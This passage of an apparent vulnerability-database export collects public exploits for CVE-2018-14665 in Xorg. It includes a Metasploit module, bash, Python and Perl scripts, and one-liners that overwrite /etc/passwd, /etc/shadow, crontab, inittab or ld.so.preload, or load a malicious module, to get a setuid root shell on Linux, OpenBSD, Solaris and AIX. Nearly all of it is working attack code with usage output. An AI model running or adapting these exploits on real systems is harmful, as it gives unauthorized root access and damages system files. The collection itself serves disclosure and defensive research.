)\r\n end\r\n\r\n def check\r\n xorg_path = cmd_exec('command -v Xorg')\r\n if !xorg_path.include?('Xorg')\r\n print_error('Could not find Xorg executable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n ksh93_path = cmd_exec('command -v ksh93')\r\n if !ksh93_path.include?('ksh')\r\n print_error('Could not find Ksh93 executable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if !xorg_vulnerable?\r\n print_error('Xorg version is not vulnerable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n status = check\r\n\r\n if status == Exploit::CheckCode::Safe\r\n fail_with(Failure::NotVulnerable, '')\r\n end\r\n\r\n if !writable?(datastore['WritableDir'])\r\n fail_with(Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\")\r\n end\r\n\r\n xorg_path = cmd_exec('command -v Xorg')\r\n ksh93_path = cmd_exec('command -v ksh93')\r\n\r\n xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])\r\n xorg_script_path = \"#{datastore['WritableDir']}/wow.ksh\"\r\n upload_and_chmodx(xorg_script_path, xorg_payload)\r\n\r\n passwd_backup = \"#{datastore['WritableDir']}/passwd.backup\"\r\n print_status(\"Backing up /etc/passwd to #{passwd_backup}\")\r\n cmd_exec(\"cp /etc/passwd #{passwd_backup}\")\r\n register_file_for_cleanup(passwd_backup)\r\n\r\n print_status(\"Executing #{xorg_script_path}\")\r\n cmd_exec(xorg_script_path)\r\n print_status('Checking if we are root')\r\n\r\n if root?\r\n shell_payload = %(#!#{ksh93_path}\r\n#{payload.encoded}\r\n)\r\n shell_script_path = \"#{datastore['WritableDir']}/wowee.ksh\"\r\n upload_and_chmodx(shell_script_path, shell_payload)\r\n\r\n print_status('Executing shell payload')\r\n cmd_exec(\"#{ksh93_path} -c \\\"echo #{shell_script_path} | su - wow &\\\"\")\r\n\r\n print_status('Restoring original /etc/passwd')\r\n cmd_exec(\"su - wow -c \\\"cp #{passwd_backup} /etc/passwd\\\"\")\r\n else\r\n 
fail_with(Failure::PayloadFailed, '')\r\n end\r\n end\r\n\r\n def generate_xorg_payload(xorg_path, ksh93_path, writabledir)\r\n passwd_file = read_file('/etc/passwd')\r\n passwd_array = passwd_file.split(\"\\n\")\r\n\r\n print_status('Retrieving currently logged in users')\r\n users = cmd_exec('who | cut -d\\' \\' -f1 | sort | uniq')\r\n users << \"\\n\"\r\n users_array = users.split(\"\\n\")\r\n\r\n logged_in_users = ''\r\n if !users_array.empty?\r\n users_array.each do |user|\r\n user << ':'\r\n passwd_array.each do |line|\r\n if line.index(user) == 0\r\n logged_in_users << '\\n'\r\n logged_in_users << line\r\n end\r\n end\r\n end\r\n end\r\n\r\n passwd_data = \"$'#{logged_in_users}\\\\nwow::0:0::/:/usr/bin/ksh\\\\n#'\"\r\n\r\n subdir_count = writabledir.count('/')\r\n relative_passwd = '../' * subdir_count + '../../etc/passwd'\r\n\r\n return %(#!#{ksh93_path}\r\n #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1\r\n)\r\n end\r\n\r\n def xorg_vulnerable?\r\n version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \\'{ print $2 }\\'')\r\n print_status(\"Xorg version is #{version}\")\r\n semantic_version = Gem::Version.new(version)\r\n\r\n vulnerable_versions = [\r\n ['6.1.9.0', '6.1.9.100'],\r\n ['7.1.4.0', '7.1.4.30'],\r\n ['7.1.5.0', '7.1.5.31'],\r\n ['7.2.0.0', '7.2.0.1'],\r\n ['7.2.1.0', '7.2.1.0'],\r\n ['7.2.2.0', '7.2.2.0'],\r\n ['7.2.3.0', '7.2.3.15']\r\n ]\r\n\r\n vulnerable_versions.each do |version_pair|\r\n if semantic_version >= Gem::Version.new(version_pair[0]) &&\r\n semantic_version <= Gem::Version.new(version_pair[1])\r\n return true\r\n end\r\n end\r\n\r\n return false\r\n end\r\n\r\n def root?\r\n id_output = cmd_exec('su - wow -c \"id\"')\r\n\r\n if id_output.include?('euid=0') || id_output.include?('uid=0')\r\n print_good('Got root!')\r\n return true\r\n end\r\n\r\n print_error('Not root')\r\n false\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n print_status(\"Writing to #{path}\")\r\n rm_f(path)\r\n 
write_file(path, data)\r\n cmd_exec(\"chmod 0555 '#{path}'\")\r\n\r\n register_file_for_cleanup(path)\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33531"}, {"lastseen": "2018-10-26T20:41:47", "description": "Exploit for multiple platform in category local exploits", "edition": 1, "published": "2018-10-26T00:00:00", "title": "xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit (2)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-26T00:00:00", "id": "1337DAY-ID-31437", "href": "https://0day.today/exploit/description/31437", "sourceData": "xorg-x11-server Local Privilege Escalation (2)\r\n\r\n#!/bin/bash\r\n# x0rg - Xorg Local Root Exploit\r\n# Released under the Snitches Get Stitches Public Licence.\r\n# props to prdelka / fantastic for the shadow vector. \r\n# Gr33tz to everyone in #lizardhq and elsewhere <3\r\n# ~infodox (25/10/2018)\r\n# FREE LAURI LOVE!\r\necho \"x0rg\"\r\necho \"[+] First, we create our shell and library...\"\r\ncat << EOF > /tmp/libhax.c\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\n__attribute__ ((__constructor__))\r\nvoid dropshell(void){\r\n chown(\"/tmp/rootshell\", 0, 0);\r\n chmod(\"/tmp/rootshell\", 04755);\r\n unlink(\"/etc/ld.so.preload\");\r\n printf(\"[+] done!\\n\");\r\n}\r\nEOF\r\ngcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c\r\nrm -f /tmp/libhax.c\r\ncat << EOF > /tmp/rootshell.c\r\n#include <stdio.h>\r\nint main(void){\r\n setuid(0);\r\n setgid(0);\r\n seteuid(0);\r\n setegid(0);\r\n execvp(\"/bin/sh\", NULL, NULL);\r\n}\r\nEOF\r\ngcc -o /tmp/rootshell /tmp/rootshell.c\r\nrm -f /tmp/rootshell.c\r\necho \"[+] Hack the planet!\"\r\ncd /etc; Xorg -fp \"/tmp/libhax.so\" -logfile ld.so.preload :1;\r\nmount # arbritary setuid we run to pop root\r\necho \"[+] Tidy up a bit...\"\r\nrm -f /tmp/libhax.so\r\necho \"[<3] 
:PPpPpPpOpr000000t!\"\r\n/tmp/rootshell\n\n# 0day.today [2018-10-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31437"}], "exploitpack": [{"lastseen": "2020-04-01T19:06:10", "description": "\nxorg-x11-server 1.20.3 - Local Privilege Escalation", "edition": 1, "published": "2018-10-25T00:00:00", "title": "xorg-x11-server 1.20.3 - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-25T00:00:00", "id": "EXPLOITPACK:ADC2F0547F06456887993FC83AC31CB3", "href": "", "sourceData": "#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet\n\ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su\n\nOverwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.\n\n\n\n\n\n#!/bin/sh\n# local privilege escalation in X11 currently\n# unpatched in OpenBSD 6.4 stable - exploit\n# uses cve-2018-14665 to overwrite files as root. 
\n# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid\n# and vulnerable in default OpenBSD.\n#\n# - https://hacker.house\necho [+] OpenBSD 6.4-stable local root exploit\ncd /etc\nXorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &\nsleep 5\npkill Xorg\necho [-] dont forget to mv and chmod /etc/master.passwd.old back \necho [+] type 'Password1' and hit enter for root\nsu -\n\n\nEBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:06:10", "description": "\nxorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation", "edition": 1, "published": "2019-01-14T00:00:00", "title": "xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-14T00:00:00", "id": "EXPLOITPACK:6CADE2C9086A89E6055B6A71CB230062", "href": "", "sourceData": "#!/bin/sh\n\n# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)\n# Date: 2018-11-25\n# Exploit Author: Marco Ivaldi\n# Vendor Homepage: https://www.x.org/\n# Version: xorg-x11-server 1.19.0 - 1.20.2\n# Tested on: Oracle Solaris 11.4\n# CVE : CVE-2018-14665\n\n#\n# raptor_solgasm - xorg-x11-server LPE via Solaris inittab\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. 
X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665).\n#\n# \"In video games, this is what they call respawning\" -- Nick Sax\n#\n# This exploit targets /etc/inittab in order to escalate privileges to root\n# on Solaris 11 (no need to be connected to a physical console). Messing with \n# inittab is considerably dangerous and you may trash your system, however the\n# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't \n# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!\n#\n# See also:\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\n#\n# Usage:\n# raptor@stalker:~$ chmod +x raptor_solgasm\n# raptor@stalker:~$ ./raptor_solgasm\n# [...]\n# Now please be patient for a few minutes...\n# [...]\n# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab\n# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab\n# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old\n# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned\n# root@stalker:/etc# id\n# uid=0(root) gid=0(root)\n#\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\n# Oracle Solaris 11 SPARC [untested]\n#\n\necho \"raptor_solgasm - xorg-x11-server LPE via Solaris inittab\"\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\n\n# prepare the payload\ncat << EOF > /tmp/solgasm\ncp /bin/zsh /tmp/pwned # fallback in case gcc is not available\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/bash\\\");}\" > /tmp/pwned.c\ngcc /tmp/pwned.c -o /tmp/pwned\nchmod 4777 /tmp/pwned\nEOF\nchmod +x /tmp/solgasm\n\n# trigger the bug\nPWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)\ncd /etc\nXorg -fp \"${PWN}::respawn:/tmp/solgasm\" -logfile inittab :1 &\nsleep 
5\npkill Xorg\n\n# run the setuid shell\necho\necho \"Now please be patient for a few minutes...\"\necho\nuntil [ -u /tmp/pwned ]; do sleep 1; done\necho \"To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab\"\nls -l /etc/inittab*\nls -l /tmp/pwned\nsleep 1\n/tmp/pwned", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:06:10", "description": "\nxorg-x11-server 1.20.1 - Local Privilege Escalation", "edition": 1, "published": "2018-11-13T00:00:00", "title": "xorg-x11-server 1.20.1 - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-13T00:00:00", "id": "EXPLOITPACK:CE863F6931CD376B67EB8A13F5A7E4E2", "href": "", "sourceData": "# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)\n# Date: 2018-11-07\n# Exploit Author: @bolonobolo\n# Vendor Homepage: https://www.x.org/\n# Version: 1.19.5\n# Tested on: RHEL 7.3 && 7.5\n# CVE : CVE-2018-14665\n# Explanation\n# The only condition that has to be met for this PE to work via SSH is that the legitimate non-root user \n# has to be logged in through the console at the moment the PE script is launched.\n# In fact, during the logged-in session of the legitimate non-root user, \n# a file with the name of the non-root user will be created in the /var/run/console folder. \n# With that file present, the same non-root user can launch a Xorg command via SSH. \n# \n# Usage: $ python poc.py\n# $ python poc.py \n# [*] Waiting for bolo to connect to the console\n# [*] OK --> bolo console opened\n# [*] Building root shell wait 2 minutes\n# [*] crontab overwritten\n# \n# ... cut Xorg output ...\n# \n# [*] Xorg killed\n# (II) Server terminated successfully (0). 
Closing log file.\n# [*] Don't forget to cleanup /etc/crontab and /tmp dir\n# sh-4.2# id && whoami\n# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)\n# root\n# sh-4.2#\n\n\n#!/usr/bin/python\nimport os\nimport getpass\nimport subprocess\n\nuserList = []\npath=\"/var/run/console/\"\n\ndef getWhoami():\n\treturn getpass.getuser()\n\ndef getConsole(path):\n\tp = subprocess.Popen([\"ls\", path], stdout=subprocess.PIPE)\n\t(console, err) = p.communicate()\n\tconsoleList = str.splitlines(console)\n\treturn consoleList\n\ndef payload():\n\tf = open(\"/tmp/payload\", \"w\")\n\tpayload = (\"cp /bin/sh /usr/local/bin/shell\\n\" \n\t\t\t\"echo \\\"#include <stdio.h> \\\" > /tmp/shell.c\\n\"\n \t\t\t\"echo \\\"#include <stdlib.h>\\\" >> /tmp/shell.c\\n\"\n \t\t\t\"echo \\\"#include <sys/types.h>\\\" >> /tmp/shell.c\\n\"\n \t\t\t\"echo \\\"#include <unistd.h>\\\" >> /tmp/shell.c\\n\"\n\t\t\t\"echo 'int main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}' >> /tmp/shell.c\\n\"\n\t\t\t\"gcc /tmp/shell.c -o /usr/local/bin/shell\\n\"\n\t\t\t\"chmod 4777 /usr/local/bin/shell\\n\")\n\tf.write(payload)\t\n\t\ndef executePayload():\t\n\tos.system(\"chmod +x /tmp/payload\")\n\tos.system(\"cd /etc; Xorg -fp \\\"* * * * * root /tmp/payload\\\" -logfile crontab :1 &\")\n\tprint \"[*] crontab overwritten\"\n\tos.system(\"sleep 5\")\n\tos.system(\"pkill Xorg\")\n\tprint \"[*] Xorg killed\"\n\tos.system(\"sleep 120\")\n\treturn\n\ndef main():\n\twhoami = getWhoami()\n\tprint \"[*] Waiting for \" + whoami + \" to connect to the console\"\n\ti = 0\n\twhile (i == 0):\n\t\tconsoleList = getConsole(path)\n\t\tfor user in consoleList:\n\t\t\tif user == whoami :\n\t\t\t\tprint \"[*] OK --> \" + user + \" console opened\"\n\t\t\t\ti = 1\n\tprint \"[*] Building root shell wait 2 minutes\"\n\tpayload()\n\texecutePayload()\n\tprint \"[*] Don't forget to cleanup /etc/crontab and /tmp dir\"\n\tos.system(\"/usr/local/bin/shell\")\t\t\t\n\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 7.2, 
"vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:05:28", "description": "\nXorg X11 Server (AIX) - Local Privilege Escalation", "edition": 1, "published": "2018-12-04T00:00:00", "title": "Xorg X11 Server (AIX) - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-12-04T00:00:00", "id": "EXPLOITPACK:4939A42DDD3D9DDC0BB267A685A819B9", "href": "", "sourceData": "# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation\n# Date: 29/11/2018\n# Exploit Author: @0xdono\n# Original Discovery and Exploit: Narendra Shinde\n# Vendor Homepage: https://www.x.org/\n# Platform: AIX\n# Version: X Window System Version 7.1.1\n# Fileset: X11.base.rte < 7.1.5.32\n# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)\n# CVE: CVE-2018-14665\n#\n# Explanation:\n# Incorrect command-line parameter validation in the Xorg X server can\n# lead to privilege elevation and/or arbitrary files overwrite, when the\n# X server is running with elevated privileges.\n# The -logfile argument can be used to overwrite arbitrary files in the\n# file system, due to incorrect checks in the parsing of the option.\n#\n# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.\n# It overwrites /etc/passwd in order to create a new user with root privileges. 
\n# All currently logged in users need to be included when /etc/passwd is overwritten,\n# else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\n# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\n# and is replaced by '-config'.\n# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.\n#\n# IBM has not yet released a patch as of 29/11/2018.\n#\n# See also:\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\n# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html\n# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl\n#\n# Usage:\n# $ oslevel -s\n# 7100-04-00-0000\n# $ Xorg -version\n# \n# X Window System Version 7.1.1\n# Release Date: 12 May 2006\n# X Protocol Version 11, Revision 0, Release 7.1.1\n# Build Operating System: AIX IBM\n# Current Operating System: AIX sovma470 1 7 00C3C6F54C00\n# Build Date: 07 July 2006\n# Before reporting problems, check http://wiki.x.org\n# to make sure that you have the latest version.\n# Module Loader present\n# $ id\n# uid=16500(nmyo) gid=1(staff)\n# $ perl aixxorg.pl\n# [+] AIX X11 server local root exploit\n# [-] Checking for Xorg and ksh93 \n# [-] Opening /etc/passwd \n# [-] Retrieving currently logged in users \n# [-] Generating Xorg command \n# [-] Opening /tmp/wow.ksh \n# [-] Writing Xorg command to /tmp/wow.ksh \n# [-] Backing up /etc/passwd to /tmp/passwd.backup \n# [-] Making /tmp/wow.ksh executable \n# [-] Executing /tmp/wow.ksh \n# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n# [-] Done \n# [+] 'su wow' for root shell \n# $ su wow\n# # id\n# uid=0(root) gid=0(system)\n# # whoami\n# root\n\n#!/usr/bin/perl\nprint \"[+] AIX X11 server local root exploit\\n\";\n\n# Check Xorg is in path\nprint \"[-] Checking for Xorg and ksh93 \\n\";\nchomp($xorg = `command -v Xorg`);\nif ($xorg eq \"\"){ \n print \"[X] Can't find Xorg binary, try hardcode it? exiting... 
\\n\";\n exit;\n}\n\n# Check ksh93 is in path\nchomp($ksh = `command -v ksh93`);\nif ($ksh eq \"\"){\n print \"[X] Can't find ksh93 binary, try hardcode it? exiting... \\n\";\n exit;\n}\n\n# Read in /etc/passwd\nprint \"[-] Opening /etc/passwd \\n\";\nopen($passwd_fh, '<', \"/etc/passwd\");\nchomp(@passwd_array = <$passwd_fh>);\nclose($passwd_fh);\n\n# Retrieve currently logged in users\nprint \"[-] Retrieving currently logged in users \\n\";\n@users = `who | cut -d' ' -f1 | sort | uniq`;\nchomp(@users);\n\n# For all logged in users, add their current passwd entry to string\n# that will be used to overwrite passwd\n$users_logged_in_passwd = '';\nforeach my $user (@users)\n{\n $user .= \":\";\n foreach my $line (@passwd_array)\n {\n if (index($line, $user) == 0) {\n $users_logged_in_passwd = $users_logged_in_passwd . '\\n' . $line;\n }\n }\n}\n\n# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log\nprint \"[-] Generating Xorg command \\n\";\n$blob = '-config ' . '$\\'' . $users_logged_in_passwd . '\\nwow::0:0::/:/usr/bin/ksh\\n#' . '\\'';\n\nprint \"[-] Opening /tmp/wow.ksh \\n\";\t\t\nopen($fr, '>', \"/tmp/wow.ksh\");\n\n# Use ksh93 for ANSI-C quoting\nprint \"[-] Writing Xorg command to /tmp/wow.ksh \\n\";\nprint $fr '#!' . 
\"$ksh\\n\";\nprint $fr \"$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \\n\";\nclose $fr;\n\n# Backup passwd \nprint \"[-] Backing up /etc/passwd to /tmp/passwd.backup \\n\";\nsystem(\"cp /etc/passwd /tmp/passwd.backup\");\n\n# Make script executable and run it\nprint \"[-] Making /tmp/wow.ksh executable \\n\";\nsystem(\"chmod +x /tmp/wow.ksh\");\nprint \"[-] Executing /tmp/wow.ksh \\n\";\nsystem(\"/tmp/wow.ksh\");\n\n# Replace overwritten passwd with: original passwd + wow user\nprint \"[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \\n\";\n$result = `su wow \"-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd\" && rm /tmp/wow.ksh`;\n\nprint \"[-] Done \\n\";\nprint \"[+] 'su wow' for root shell \\n\";", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:06:10", "description": "\nxorg-x11-server 1.20.3 - Privilege Escalation", "edition": 1, "published": "2018-10-30T00:00:00", "title": "xorg-x11-server 1.20.3 - Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-30T00:00:00", "id": "EXPLOITPACK:42DE7B337F917EBF2EF618E51199BCA2", "href": "", "sourceData": "# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation\n# Date: 2018-10-27\n# Exploit Author: Marco Ivaldi\n# Vendor Homepage: https://www.x.org/\n# Version: xorg-x11-server 1.19.0 - 1.20.2\n# Tested on: OpenBSD 6.3 and 6.4\n# CVE : CVE-2018-14665\n\n# raptor_xorgasm\n\n#!/bin/sh\n\n#\n# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. 
X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665).\n#\n# This exploit targets OpenBSD's cron in order to escalate privileges to\n# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical\n# console, it works perfectly on pseudo-terminals connected via SSH as well.\n#\n# See also:\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\n# https://www.exploit-db.com/exploits/45697/\n# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850\n#\n# Usage:\n# blobfish$ chmod +x raptor_xorgasm\n# blobfish$ ./raptor_xorgasm\n# [...]\n# Be patient for a couple of minutes...\n# [...]\n# Don't forget to cleanup and run crontab -e to reload the crontab.\n# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab\n# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned\n# blobfish# id\n# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)\n#\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\n# OpenBSD 6.4 (Xorg 1.19.6) [tested]\n# OpenBSD 6.3 (Xorg 1.19.6) [tested]\n#\n\necho \"raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\"\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\n\n# prepare the payload\ncat << EOF > /tmp/xorgasm\ncp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c\ngcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid\nchmod 4777 /usr/local/bin/pwned\nEOF\nchmod +x /tmp/xorgasm\n\n# trigger the bug\ncd /etc\nXorg -fp \"* * * * * root /tmp/xorgasm\" -logfile crontab :1 &\nsleep 5\npkill Xorg\n\n# run the setuid shell\necho\necho \"Be patient for a couple of minutes...\"\necho\nsleep 120\necho\necho \"Don't forget to cleanup and run crontab -e to reload the crontab.\"\nls -l /etc/crontab*\nls -l 
/usr/local/bin/pwned\n/usr/local/bin/pwned", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T20:41:02", "description": "\nxorg-x11-server 1.20.3 - modulepath Local Privilege Escalation", "edition": 2, "published": "2018-11-30T00:00:00", "title": "xorg-x11-server 1.20.3 - modulepath Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0745", "CVE-2018-14665"], "modified": "2018-11-30T00:00:00", "id": "EXPLOITPACK:36340A6356958B8A5C9291F39ED5BA27", "href": "", "sourceData": "#!/bin/sh\n\n#\n# raptor_xorgy - xorg-x11-server LPE via modulepath switch\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665).\n#\n# This exploit variant triggers the bug in the -modulepath command line switch\n# to load a malicious X11 module in order to escalate privileges to root on\n# vulnerable systems. This technique is less invasive than exploiting the \n# -logfile switch, however the gcc compiler must be present in order for it to\n# work out of the box. Alternatively, you must use a pre-compiled malicious .so\n# compatible with the target system and modify the exploit accordingly.\n#\n# It works very reliably on Solaris 11.4 and should work on most vulnerable\n# Linux distributions (though I haven't tested it). For some reason, it fails to\n# obtain uid 0 on OpenBSD... 
They might have an additional protection in place.\n#\n# Thanks to @alanc and @nushinde for discussing this alternative vector.\n#\n# See also:\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\n# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm\n# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html\n# https://nvd.nist.gov/vuln/detail/CVE-2006-0745\n#\n# Usage:\n# raptor@stalker:~$ chmod +x raptor_xorgy\n# raptor@stalker:~$ ./raptor_xorgy\n# [...]\n# root@stalker:~# id\n# uid=0(root) gid=0(root)\n#\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\n# Oracle Solaris 11 SPARC [untested]\n# CentOS Linux 7 [untested, it should work]\n# Red Hat Enterprise Linux 7 [untested]\n# Ubuntu Linux 18.10 [untested]\n# Ubuntu Linux 18.04 LTS [untested]\n# Ubuntu Linux 16.04 LTS [untested]\n# Debian GNU/Linux 9 [untested]\n# [...]\n#\n\necho \"raptor_xorgy - xorg-x11-server LPE via modulepath switch\"\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the payload\ncat << EOF > /tmp/pwned.c\n_init()\n{\n\tsetuid(0);\n\tsetgid(0);\n\tsystem(\"/bin/bash\");\n}\nEOF\n# libglx.so should be a good target, refer to Xorg logs for other candidates\ngcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so\nif [ $? 
-ne 0 ]; then echo; echo \"error: cannot compile /tmp/pwned.c\"; exit; fi\n\n# trigger the bug\necho \"Got root?\"\nXorg -modulepath \",/tmp\" :1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-10-24T23:13:32", "description": "", "published": "2019-10-22T00:00:00", "type": "packetstorm", "title": "Xorg X11 Server SUID modulepath Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-10-22T00:00:00", "id": "PACKETSTORM:154942", "href": "https://packetstormsecurity.com/files/154942/Xorg-X11-Server-SUID-modulepath-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Post::Linux::System \n \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Xorg X11 Server SUID modulepath Privilege Escalation', \n'Description' => %q{ \nThis module attempts to gain root privileges with SUID Xorg X11 server \nversions 1.19.0 < 1.20.3. \n \nA permission check flaw exists for -modulepath and -logfile options when \nstarting Xorg. This allows unprivileged users that can start the server \nthe ability to elevate privileges and run arbitrary code under root \nprivileges. \n \nThis module has been tested with CentOS 7 (1708). \nCentOS default install will require console auth for the user's session. \nXorg must have SUID permissions and may not start if running. \n \nOn successful exploitation artifacts will be created consistent \nwith starting Xorg. 
